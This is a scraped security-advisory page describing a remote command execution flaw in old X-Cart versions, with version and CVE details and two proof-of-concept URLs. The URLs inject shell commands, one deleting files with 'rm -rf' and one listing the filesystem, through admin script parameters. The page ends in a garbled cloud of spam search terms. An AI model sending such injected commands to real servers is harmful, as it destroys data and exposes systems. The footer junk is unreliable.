exploits , vulnerabilities , articles , Qualiteam X-Cart Remote Command Execution Vulnerability

Title	Qualiteam X-Cart Remote Command Execution Vulnerability
Published	2004-02-03-12:00AM
Updated	2004-02-26-06:08PM
Class	Input Validation Error
CVE	CAN-2004-0241
Remote	Yes
Local	No
Credit	Discovery of this issue has been credited to Philip <securityfocus@magicwebsolutions.co.uk>.
Vulnerable	Qualiteam XCart 3.4.11 Qualiteam XCart 3.4.3 Qualiteam XCart 3.4 .0 Qualiteam XCart 3.3.2 Qualiteam XCart 3.3 .0 Qualiteam XCart 3.2.1 Qualiteam XCart 3.2 .0
Not Vulnerable	Qualiteam X-Cart 3.5.4 Qualiteam X-Cart 3.5.2 Qualiteam X-Cart 3.5.1 Qualiteam X-Cart 3.5 .0 Qualiteam X-Cart 3.4.12
Code	No exploit is required to leverage this issue. The following proof of concept has been provided: http://server/admin/upgrade.php?prepatch_errorcode=1&patch_files[0][orig_file]=VERSION&perl_binary=/bin/rm -rf &patch_exe=.. http://server/admin/general.php?mode=perlinfo&config[General][perl_binary]=/bin/ls -lR \|\|
TXT

Vulnerabilities - newest 10 RSS | More

2009-12-18 Drupal Contact and Menu Modules Multiple HTML Injection Vulnerabilities
2009-12-18 Mozilla Firefox and SeaMonkey NTLM Credential Reflection Authentication Bypass Vulnerability
2009-12-18 Mozilla Firefox CVE-2009-3982 JavaScript Engine Multiple Remote Memory Corruption Vulnerabilities
2009-12-17 Zen Cart Insecure File and Programs Information Disclosure and Database Deletion Vulnerability
2009-12-17 Winamp Module Decoder Plugin Multiple Buffer Overflow Vulnerabilities
2009-12-17 Winamp JPEG and PNG Multiple Integer Overflow Vulnerabilities
2009-12-17 HP OpenView Storage Data Protector Stack Buffer Overflow Vulnerability
2009-12-17 IBM WebSphere Application Server Feature Pack for CEA Spoofing Vulnerability
2009-12-17 Digital Scribe Cross Site Scripting and SQL Injection Vulnerabilities
2009-12-17 WP-Forum WordPress Plugin Multiple SQL Injection Vulnerabilities

SECURITY RSS FEEDS

Advertising

Copyright 2007, SecurityDot
Fri, 18 Dec 2009 17:43:45 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
200+%252Fc SSH-2.0-Op wwwsex.cqb Filezilla Crack Data tightVNC H...rem/ol srilankan pornfourfr camasutra vidiossex JPG php-nuke 2 Music down linux kern sex animal buestbook Sexivideo. php-nuke 2 sexy maroc shat sex a Sexfoto apache inj all cartoo www.shakil joomla rem PHP%252BPr odules/vwa news for C 3.x vbulle news for c www.Hotpic mambo Remo WWW.HotGri indiansexp news for c 258wg.ys16 Bf asin ph m...w.smc. bad jojo.c cart32.exe hot scene Www.sex+vi www.showar maxcpm.inf gokbayrak. filmsexi cnsyb.com ...?? bold